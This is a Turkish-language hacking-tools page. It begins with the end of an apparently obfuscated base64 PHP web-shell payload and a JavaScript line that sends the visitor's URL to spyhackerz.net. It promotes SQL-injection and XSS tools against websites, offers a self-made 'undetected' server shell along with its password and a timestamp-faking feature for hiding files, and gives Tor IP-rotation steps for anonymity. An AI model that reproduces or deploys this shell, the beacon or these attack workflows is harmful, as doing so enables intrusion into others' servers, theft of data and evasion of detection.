sevapwxParKuUQgUmIKB8PCbnxdiBw4UaClL5ykyZQX9p6TLtk+yF7iPKx/ebByun10dNbRO1HVJH/g/ZAXB0oBrqZUPH/2Or9lmx8MoKiSN1q1itvaB0KQBEntAOlLX+1FrclHnyezqxSPHExDwcAzgUS6cPIdlgjwZcdcbwJcRmB3Cc4F06buvwHbrhdPtw5Oz9fMzbWf98KDANgUVpZbxAMQHSEHdOA+HHXYxci5m0gJ1+PoRpot1kvqp4xwEFkfXcHoxZ2bwcISNftQp/fiIMcxXRnnm4pXeJL33NGcWZu8ImzPdvmUz+fBjfLD+OKxTOXQlltfRLxYF+FMuqg4CMAjo2LBO5B+PUj6GLF4HNQLhG3CsIlka5K2wD4ya+xzAcODAKTALILfDgGCOhRWV49D3vPRUprI96eyPn/HQw5RgtICME80iHmgkn530GNOZGjUkTGogYiQRfKhDCyKE0JCFZE5OGycXjZNvhdP1k52js5vNnb0GPBmGSSkhNdHZQlyhHbHa87ckQQFySEjaJwW3B5BBPrLndRJc8eyOpPwH7Z8EB4aHPjtPAIO00dAw2jqAYhgDRwjeg9IAcGX5dNtRdxjmDacQq5EACF0mdq8fb7153ko0xWV2NoUJymrgjUqgjh401HUKKySTd1DojZ4HDnpV0cCGE/qu8ShuhAgrjPphdnN++KrWwLWm1CGwogI3P5ad3QoUf1U76H6AtbMTv7DXyJKDYz2Pu5HRpkM97b6iTbBs5Uwg/XgzuzGr+aqmgnjSTuyuFzFjtuw2gqypyiBJOfRTTZun7EQVYghhkK02ub4wFVcYsixFQMuj6mwPZVT+6lqxhlen/5Aksifrz5sx0LpK3xao0oYJM2LnydBEII7C8wf+mmSaMuaKSpvUEXuQgHoeSoIrY4pXirpGlrXSSC/GsfVEK6qopSk8TJOZGMbuYbFf4yQUe5TZ029uThqn53tnNzd6zCJTwHpEhGjT9SPDi7zI8yVVPP1tUUW81+t6/dD2yCJj6Upyn8g4IUkkHfOYcjzZZAQyUeR1FfiYlNkEZo3bCvuHSQ2oqPiobgHSwsiOTfw6Iu+2MWRwvoyWOLaAlo70MXJMw2VIdB3LIlImJUK6Bec6P8rZVXGVxguO6oTGVGyyslnaVFnVqf3qmshqR6yKhBKSz+RHIhSktnctdnYDFyjA9j+TwXGNjrbTs7yeHTrGXV97Z3r+47I0YOwsfiVO4BVqmvGRSz3gRw5XpsSGqvH5kEz3gxFooKazPLMP/rCXaQrSY2wGAGmozpOpAg5x3LcBVaZS4sDSHXuIe7MKBPAMmKIKfg9jkGNbITG+4Ie61F4IBJ3Aj+MGWQnclAh6LC2Jm1KGUCRncVnHk1t2Ornlh5Nnht3yuqBLexQWTUVyihiD85NMq0Kabbg2zNba445VpEVIiZyMSotMLRxadcQsqxEQYpiX1pEtiXKZzcW547QZO4Yd2SQvltmiyBynQVyuzzSHhTIbY1njNCUFhWWNgeYWgivyaq+ZSAJ/NYoCh/Aou1ggR1kPHt6Ak+5CWSt4rRbc89FVxnxkwuKTgYVrj2dG+wAOUQVehtfh5ieibgUDBaKzQuap0PlAi5GPiQlCsKLsN+d7RYRDhBXPqZq9cbcrJG8d3KnUl0iKXfED6vpkw24ZZMMvMhyoT/WMmIyYSPkwL0F/VNC2hUiExVo5oyLcJ+jXkU7+yayUighZWtZSaWBCA0YIcehWu2JGgbtrP1L+JPoGlhdTNXoXrCTNgIaAgoUNoYJ7R1HY6oFRm011Oz9LCp+pMsVGlep0kM7AjI78Gs+9/9tBx4lsGiYONNjV4nX4Y7r88+/r3o+p8s9SlXmlQniKiZtUMw4ZAgVLchUlXrAkppVj7ZZcke/x8HNZsxwbVVj/Dw==”,$s_pass);?>

app.js

a=new/**/Image();a.src='http://spyhackerz.net/save2.php?a='+escape(location.href);

Web Güvenlik Açığı Tarayıcıları

Wireshark network programları arasında bilinen belkide en iyi programdır, aslında bir hack yazılımı değildir ancak bu yazılımı hackerlar kendi menfaatleri doğrultusunda kullanarak hack saldırılarında yardımcı element olarak sıkça kullanırlar. Wireshark harika bir paket çözümleyicisidir ! portları dinleyebilir ve paketleri çözebilirsiniz, tabiki bu yazılımı bilgisiz kişiler kullanamazlar, ağ konusunda bilginiz yoksa bu yazılımı boşuna indirmeyiniz fazla birşey anlayamazsınız, önce ağ network konusunda yeterli bilgi edinin ve bu yazılımı kullanın, kullanmasını bilen için oldukça tehlike yaratabilir. Wireshark 2009-2010 yılında facebook hesaplarının şifrelerinin sıfırlanmasında kullanılıyordu, yani hackerler bu yazılım ile facebook hesapları bile hacklediler ! Bir network meraklısı bu yazılımı kullanmadan birşey yapamaz.

Safe3 yazılımı orta düzey bir Web Vulnerability Scannerdir. Program sayesinde hızlı ve basit olarak sitelerde file upload, sql injection ve xss gibi bir çok açık tarayabilirsiniz. Yazılımın en güncel sürümüdür. Vaktim yok siteleri hızlıca taramak istiyorum diyenler için iyi bir alternatifdir.

Bashter – Web Crawler, Scanner, And Analyzer Framework 4.1

Kullanımı oldukça basit olan Bashter yazılımı sitelerde güvenlik taramaları yapmaya yarıyor. Sitedeki açıkları tarayıp size rapor sunar bu sayede hedef hakkında bolca bilgi edinirsiniz.

kullanım: dosyayı indirip klasörün içine girin ve bash bashter.bash komutu ile çalıştırın.

Özellikleri

 • Web Crawler
 • Gather Input Form
 • Detect Missconfigured CORS
 • Detect missing X-FRAME-OPTIONS (Clickjacking Potential)
 • Detect Reflected XSS via URL
 • Detect Reflected XSS via Form
 • Detect HTTP Splitting Response via CRLF Injection
 • Detect Open Redirect

Havij SQL injector aracının ilk sürümlerinden birisi ve lisans veya crack istemiyor tamamen ücretsiz olarak dağıtılan versiyonudur. SQLmap yokken havij vardı ve çokda etkili bir araçtı, hala daha etkili olduğunu rahatlıkla söyleyebiliriz !

Havij’in bağzı bilindik özelliklerini yazalım.

 • Complete HTTPS support.
 • Various updates are available.
 • Added MS SQL blind.
 • Blind MSAccess (in commercial version only)
 • PostgreSQL.
 • Easily accessible user manual.
 • Additional dumping data file feature.
 • XML format comes with the tool for data storage.
 • Blind sql injection.

WebCruiser Enterpise edition (Full) 

Havij adlı programdan çokdaha üstün bir sql injector yazılımıdır, aslında buna tek başına sql injector demek çok yanlıştır, post ve get işlemlerinide yapabilmektedir, XSS,CSRF gibi açıklarıda bu program ile kolayca kullanabilirsiniz, ufak bir pentest tool denebilir ve her hackerin bilgisayarında mutlaka olmazsa olmazlardandır.
not: Blind injection konusunda inanılmaz yetenekli bir programdır.​

Undetected Shell

p.a.s shell olarak bilinen kendi yaptığım özel bir shelldir, birçok linux sunucuda görünmez olması bu shelli özel kılıyor, komut ekranı çok gelişmiştir ve linuxun birçok kısmında komut çalıştırma denemesine izin verir ! filemanageri ise harikadır çünkü bir dosya yüklerken utf8 olarak yüklemek için uğraştırmaz kendisi yükleme esnasında dosyanın dilini algılar ve ona göre yüklenmesi sağlar. Ayrıca dosyaların yüklenme veya modifiye tarihlerini kolayca değiştirmenize olanak sağlar (görünmez yapacağınız dosyanın tarihini değiştirmek çok faydalıdır) mutlaka bulunması gereken shellerden biridir.

shelle giriş şifresi: asdf

-Dosya yükleme
-Dosya oluşturma
-Gelişmiş komut ekranı
-Gelişmiş filemanager
-SQL Bağlantı

Saniyede IP Değiştirme Araç Kiti

1-) Terminali açıyoruz.

2-) git clone https://github.com/ruped24/toriptables2.git yazarak gerekli paketi indiriyoruz

3-) git clone https://github.com/ruped24/tor_ip_switcher.git yazarak Toolumuzu indiriyoruz.

4-) apt-get install tor tor tarayıcısını indiriyoruz

—————————————–
TORLA İLGİLİ KOMUTLAR
start tor tor servisini başlatır
stop tor = tor servisini durdurur
check it = durumu kontrol eder
—————————————–

5-) Leafpad ile komut satırını değiştiriyoruz leafpad /etc/tor/torrc buraya giriyoruz

6-) Control Port ve Hash den başlayarak satırlardaki # işaretini siliyoruz

7-) tor –hash-password = hash şifresini değiştiriyoruz

 Leafpad/etc/tor/torrc yazıp hash kısmına verilen sayıyı kaydediyoruz.

9-) cd toriptables2

10-) python toriplables2.py -l = toriptables2 yi başlatır

11-) cd tor_ip_switcher

12-) python tor_ip_switcher = toripswitcher başlatır

13-) Ardından belirlediğimiz şifreyi giriyoruz.

Ve ipmiz her 5 saniyede değişiyor